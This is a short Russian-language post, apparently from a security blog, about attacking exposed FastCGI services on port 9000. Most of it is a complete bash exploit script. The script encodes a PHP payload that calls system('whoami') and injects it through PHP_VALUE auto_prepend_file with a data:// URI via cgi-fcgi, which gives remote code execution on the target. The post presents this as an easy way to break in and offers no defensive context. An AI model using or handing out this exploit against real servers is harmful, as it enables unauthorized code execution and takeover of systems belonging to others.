Видел хоть раз открытый порт 9000? Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI. А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом: #!/bin/bash PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда FILENAMES="/var/www/public/index.php" # Путь к существующему файлу HOST=$1 B64=$(echo "$PAYLOAD"|base64) for FN in $FILENAMES; do OUTPUT=$(mktemp) env -i \ PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \ SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \ cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT cat $OUTPUT done Или воспользоваться более мощным клиентом, например, таким.
